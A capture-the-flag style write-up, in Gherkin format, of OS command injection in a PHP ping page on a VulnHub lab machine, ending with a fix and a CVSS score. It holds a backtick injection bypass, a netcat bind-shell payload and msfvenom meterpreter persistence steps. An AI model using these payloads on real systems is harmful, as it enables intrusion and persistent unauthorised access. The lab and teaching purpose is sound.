## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    http://192.168.1.66 - ip (field)
  CWE:
    CWE-78: Improper Neutralization of Special Elements used in an OS
    Command ('OS Command Injection')
  Rule:
    REQ.173: R173. Discard unsafe inputs
  Goal:
    Get a shell
  Recommendation:
    Discard unsafe inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
    | Curl            | 7.71.1      |
    | Netcat          | 0.7.1       |
    | Virtualbox      | 6.1         |
    | Metasploit      | 5.0.99-dev  |
  TOE information:
    Given I am accessing the site at http://192.168.1.66
    And it runs on virtualbox

  Scenario: Normal use case
    Given I access the site at
    """
    http://192.168.1.66/
    """
    And the page let me make a ping to a site [evidence](ping.png)
    When I ping a host
    Then I can see the page redirects me to
    """
    http://192.168.1.66/index.php?log=logs/<IP>.log
    """
    And "<IP>" is the ip from which I'm accessing the site

  Scenario: Static detection
    Given I look at the code of "index.php"
    """
    ...
    11  $tarjet = $_POST['ip'];
    12  $tarjet = str_replace(array("<?", "?>", ";", "&", "|", "(", ")",
        "'", "\""), "", $tarjet);
    13  system("ping " . $tarjet . " -c3 > logs/" . $ip . ".log");
    14  header("Location: index.php?log=logs/" . $ip . ".log");
    ...
    """
    And in line 12 I can see some characters are being replaced
    But it does not replace "`"
    And I can conclude I can bypass the restrictions

  Scenario: Dynamic detection
    Given that I know the system don't replace "`"
    When I enter the host
    """
    `ls -la > out`localhost
    """
    Then I get the output of "ping localhost" [evidence](ping.png)
    When I go to
    """
    $ curl -XGET 192.168.1.66/out
    """
    Then I can see the file gets created [evidence](executed.png)
    And I can conclude that I can exploit the system

  Scenario: Exploitation
    Given that I can execute arbitrary commands on the server
    When I make a ping request to
    """
    `nc -lvp 6005 -e /bin/bash`localhost
    """
    Then I can connect with "netcat":
    """
    $ nc 192.168.1.66 6005
    """
    And I get a shell
    """
    www-data@42Challenge:~/html$ id
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    """
    Then I can conclude that the vulnerability can be exploited

  Scenario: Maintaining access
    Given that I have a shell
    And I can create a payload with "metasploit"
    """
    $ msfvenom -p php/meterpreter/bind_tcp -f raw > shell.php
    """
    When I upload the file "shell.php" to the server
    Then I can use "metasploit" to listen for a meterpreter session
    """
    $ msfconsole
    msf5 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf5 exploit(multi/handler) > set payload php/meterpreter/bind_tcp
    payload => php/meterpreter/bind_tcp
    msf5 exploit(multi/handler) > set RHOST 192.168.1.66
    RHOST => 192.168.1.66
    msf5 exploit(multi/handler) > exploit

    [*] Started bind TCP handler against 192.168.1.66:4444
    """
    When I go to
    """
    http://192.168.1.66/shell.php
    """
    Then I get a "meterpreter" session [evidence](meterpreter.png)
    And I can conclude that I can maintain access to the machine

  Scenario: Remediation
    Given I have patched the code by adding:
    """
    12  if (filter_var($tarjet, FILTER_VALIDATE_IP)) {
    13    system("ping " . $tarjet . " -c3 > logs/" . $ip . ".log");
    14    header("Location: index.php?log=logs/" . $ip . ".log");
    15  } else {
    16    echo "Enter a valid Ip address";
    17  }
    """
    And line 12 verifies if the input data is a valid ip
    When I try again
    """
    `nc -lvp 6005 -e /bin/bash`localhost
    """
    Then I get [evidence](fixed.png)
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10.0 (Critical) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5 (Critical) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.5 (Critical) - MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2020-08-18}
